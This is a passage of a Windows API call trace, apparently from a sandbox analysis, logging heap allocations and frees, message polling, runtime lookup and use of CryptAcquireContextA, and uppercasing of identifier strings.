hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0200.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0200.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.537] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0200.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0200.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0200.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.538] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0200.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3688 | out: hHeap=0x25c0000) returned 1 [0200.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.539] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad63f8) returned 1 [0200.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0200.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.542] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.542] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.542] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0200.542] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.543] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0200.543] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.543] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.543] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.543] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.543] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.543] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.544] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0200.544] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.544] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0200.544] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.544] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.544] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.544] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.545] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0200.545] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.545] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0200.545] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0200.545] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.545] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0200.545] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.545] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.546] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0200.546] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.547] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0200.547] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.547] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.547] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.547] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.547] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.547] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.547] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.548] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.548] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.548] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0200.548] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.548] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0200.548] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.548] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.549] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.549] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.549] 